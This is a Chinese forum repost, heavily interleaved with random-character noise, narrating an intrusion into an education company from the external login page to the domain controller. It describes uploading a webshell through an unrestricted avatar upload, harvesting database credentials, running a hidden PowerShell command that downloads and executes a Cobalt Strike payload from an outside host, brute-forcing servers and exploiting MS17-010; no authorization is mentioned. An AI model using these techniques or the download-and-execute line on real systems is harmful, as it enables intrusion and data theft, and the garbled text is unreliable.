|
1 ?4 X5 Y- k$ U! U; x9 m4 p 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
2 c# X" v4 v5 b$ X9 x) x
+ f$ F9 D& Y4 N- U. D" B' c
+ b. \. r; z7 D' s ! Q3 e( b: t$ z# Z, l. @ t
7 l% o' Z# I" n$ _' Y7 D7 u" ^) f2 L+ j' t3 ?. N! ?. \0 h
正文+ R! Y0 A2 {" x4 {# w& f
" I: s7 T# G& c' H- C+ h
6 c6 D' C0 m" _2 C, y! O( I
4 R+ M9 Z% {& {( l 9 z& ]4 K* d" }1 C
( }0 U+ r2 Z8 g- w- k: c* j) t: N 目标:www.xxxx.com(一家教育机构)
9 R7 f1 ?; r1 D/ }" z' n打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
+ n- b7 d& [: F$ C ! h2 m( j# r3 `( ?0 K# e# f
& Q0 y. {( a! x- A: U% s) o
7 ^( M7 N. B0 E$ r4 t/ | ( d- d# u8 f$ `7 ?, ]; u& n
# x; c: t5 m& ] Q: d, r. S: W 进行了简单的信息搜集
) o, E3 M4 E) a& m, t
4 d6 F8 h; [ P5 j
4 {1 ]9 C( N( t: x ; `- R, r* i. S7 J6 B+ A. m; |1 y
2 d7 x/ Y4 E# G- B t3 t+ R3 p
子域名搜集( c* D2 W# c/ L: k1 T. T# u6 o
& b3 g& j( w8 V2 p* |* F+ ~
: ~8 M( d* C, [( s- g \: g; `: W Y+ }  1 A0 V, k% X1 |+ k( D( w+ M; w
7 w& x3 b- A' \( y1 ?5 _; ], M0 a
fofa找资产
: Q( d- C# T* y& }
: Z9 u/ ?# U% X0 \& b! z
* J% F9 }7 U* K+ b; g
7 Q4 ~7 N1 [- B4 ]4 x$ D+ _4 t9 E; j& u, H! G
/ ~ T y! O F" z" {" R 7 F8 |% V" D6 P
4 M- P" z2 [$ I
一共七个资产。去重之后只有两个。
, d. l4 m# {) ]6 t1 G+ t: J
# C" B+ b8 v, e# K7 H( |
7 C3 O9 e$ p" @! r( a
+ t8 g: W, U# Q8 S7 z: t& U# Z2 V
& C4 U4 V5 k/ j) w" g2 N1 G0 c
目录探测- X5 G" v, M$ V) r: r
F- q+ @8 u$ I4 z& }
' N, D& O4 @; D; l! I/ A3 w) N# Q5 Z  % i! t4 ^, g3 _* o& |' V, F: ^
$ W- k( g7 a4 Y7 v
/ d+ D* ~8 h+ Q- P* T 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
) D: M) a) {: {! y/ o! T
# k3 \2 i" B, Q" S# y( R7 U9 S# J
# ]4 n/ O! y/ ?# K7 r' u. O # W1 ~$ b6 ~6 T, b( q
1 N% J4 |' L9 I1 W V$ i. q! b
我又尝试了通过修改返回包来绕过登录界面
$ o1 ~; u# w6 H
6 S6 R9 `% g* P, C- M& w. ]) b7 G2 }% c& L Q2 I. g1 k$ ]
 ' A! ?9 _2 \. `. S
: W9 }7 Q& X' m% Z+ n6 }
* A- G9 K8 T2 {. S' ~, D
还是不行,尝试注入无果, }: E5 F+ @9 |. l4 H. `
5 K' r+ w7 D) f4 |
; m* G2 b% r/ Y. m4 g
. i3 m4 h' k! Y; Z+ W* @% ?( @ 5 I9 ?, C- P+ P% Z
5 U$ _* r) G" Z 不过我目录探测出了一处Spring信息泄露
3 g! w _' }' Y
8 j/ U. R: }7 s7 q
) I. Q* ]0 {' m. F4 p
. [5 x% W; [$ e+ S n4 a! }# C0 C( \3 c. z
0 s: w% w5 X# S( d7 C$ e8 J
5 w! I" }$ g& L
/ D& L8 O' e' U& G8 `1 d 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录- x, F( C5 r+ V$ {4 d
+ j) s& h2 N5 I% I% h* o
& j- h2 i& Y- K! d/ K  " s( S/ C( F" S, J4 D7 \$ Y
% d& T+ Z. \) F2 q) F3 D
8 k( z/ K( B- Y 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。* E8 h+ q: Q) Y# `/ r8 k8 ]
( ?& s! z7 k9 ?
' ]5 j2 e" z1 u! }5 E6 t6 {7 ~ 
F+ i u0 Y& E1 Q# p8 \
* ~8 t& C: [6 \0 E* R' s! ]4 e2 E3 e% U5 R" D
获取有些师傅到这一步就手机抓包电脑测了。. ], N# c& ]: r! ]1 e+ d" E$ R
: Z( q5 q l1 w) E9 h1 R9 T0 z u* P9 Q% ?# i6 v# ^
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。8 ?' X z" m: i m
) s. [3 x X3 C% k, u5 [0 g/ x y; c
R: P4 u/ }! ?$ c7 u6 l5 S 其中在一个公众号发现了小程序,可以进行注册。% g4 i) T$ B6 i8 @& O
: ^) O) K q7 q" r$ B+ C# Y' k8 k4 s' `
看到了头像上传,尝试上传获取WebShell
- k9 P+ b7 L5 l6 `9 i% ~
7 ^" B4 Y+ z) D' \6 v [/ H. ?8 a m4 [8 e
1 _5 a1 ^" p/ j* C2 f7 c: f1 Q" h
: ^. i/ s; `) T& R' m1 d! ^' }3 `/ _# Y5 Q: h% y2 j% l
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问/ N* I/ r, w/ G2 O9 |" d
, i. W* g) p+ m4 Y
5 ?: r& Q& d w8 k* m
 ) a1 H2 P8 x9 w/ V
' @% ]$ j. T, A8 L0 t1 s2 F3 `7 k S' S2 B
然后上了大马
* l. R. F2 O, Y ( X3 m* U7 t* V5 T- J) {7 w
) p9 Q9 c2 t; z. d: W/ a  ' d/ i) k9 o7 x0 O. P
0 e4 T, I* n$ E4 z4 ^9 }( ]
0 P! _. I) _' x5 u 
$ B2 q! { U0 i( k8 X" p5 z' m! } 8 E* O) [& k. o6 c
) u4 z2 t9 t3 k 通过翻找文件发现数据库账号密码0 r" ~& N0 X% i) s! N
- m; S# P4 f6 d% O0 w4 N
% T' R% C% J5 ]$ y1 _ W' p 
6 m( L( u' G; a ) [& X% ]9 z" ]3 Y3 V* g
" E/ Y; U7 J9 I1 q) Y& H! z --内网渗透
2 l3 }& E4 I2 h( O1 ? 8 N' m9 y( N/ J
4 k! B, C. j) ]% X
直接通过powershell执行 cs上线
( i) g3 _1 r7 ^- T3 K
) ^* y- m0 w( x9 S5 _. f' Z9 k' `" _9 Z9 B6 W2 A. ~
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"6 ^2 X |' u$ P+ ^* n( m
0 P& a2 k9 b+ K( y" y4 b& [$ Y4 k
& b4 M- a$ V, ~' u$ [6 \  7 M7 |3 @' G2 d9 |% V9 p: v# W
6 k; O9 W/ G0 u. ^- B! a) ?" y8 u+ h9 J) }7 i- g
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破- N/ z- \8 p5 F! s
& M1 X9 [5 z: I. m& ~* `
$ z/ C/ L6 G1 r6 \/ b% ^# E
 ' s( N! i$ `7 R" t
. V: R2 X* O/ t( B3 Q( j8 H* K
! w5 ~/ F4 e4 i9 L* @3 t
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
& E P, ~4 H3 ~2 {
( i) H' ]( B5 y0 k
# f3 M- ?+ J+ a( R q
! J/ X6 g( @/ p% T. K8 a" S
' H) M( @6 s: D* W U4 ?" e* U
* M# X7 d$ t: v  ' c: s {- M3 R; @# T
$ `! Z5 ~# @- t$ {' P1 F2 b, P& M) J+ K0 J0 J. t3 y+ r1 N- _4 U
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
% o1 p# h0 @0 c1 k
- }. [, J' |2 |
4 O# I1 _9 h5 X. e 3 [' k4 E0 ]6 P) ~+ D3 z. a+ l0 A
) K) @. b- ]* P6 {
9 ^/ `% n, Q* E; \' L" Z
+ f) w5 ]2 L# N$ v) q! D, A
8 g% j: m0 O2 M" Q1 f
2 A# q( Y5 P/ e) q
" j5 P2 h w! m8 F" S: e! j
# Y# [( t: M$ g' n2 D
' W- O; N' a1 N/ |( s/ X
. k7 h3 y7 g; h* | ( Q6 A1 m# g3 _: c* ~& E
9 _% ^4 {* n5 C( U7 @6 c3 H0 E; d( y, k* r; m
小结- k6 f1 E- `- U/ m# g
& b1 ~6 l5 \/ S) U3 b3 [0 `* r$ m# f7 i
. r- @( ~* B) C/ t; x( B2 V) { 7 m. B4 f: h; r) [9 L
5 s/ J( \5 K: Q+ {2 M
" B7 a% c! G# d/ X& P |
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
* u4 G/ u! p# F, T$ }0 W$ M
6 {; E1 N. T& Q( L, {+ T. b3 O, S' M, D! K
) d4 E6 C+ \9 o8 m( Z, f
- H, z1 _/ R* i1 [* r7 ^6 j2 ~; I0 g( M
-
, J. k" u: ^! S7 R ' ?+ e. }$ G, [1 x) L
+ h2 J* m0 U3 Q8 Q7 `, A2 c4 [1 G
-
( r v( x- _ C9 E* X
3 U' O0 D; X7 J- X' V) P' `0 U F
% |( x$ O2 M& u! V7 K8 k
/ W6 X$ H5 H* U5 `3 Q
! F- {) @* } f7 z& x: M 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
$ U$ {* K2 h1 T
8 q: F1 H8 I: u# Z+ k! L& X( i6 c0 I+ A+ p
: X# v" \. t3 U0 \5 a. D2 ]! R' u | 
发表于 2024-3-1 19:41:32
收藏
支持
反对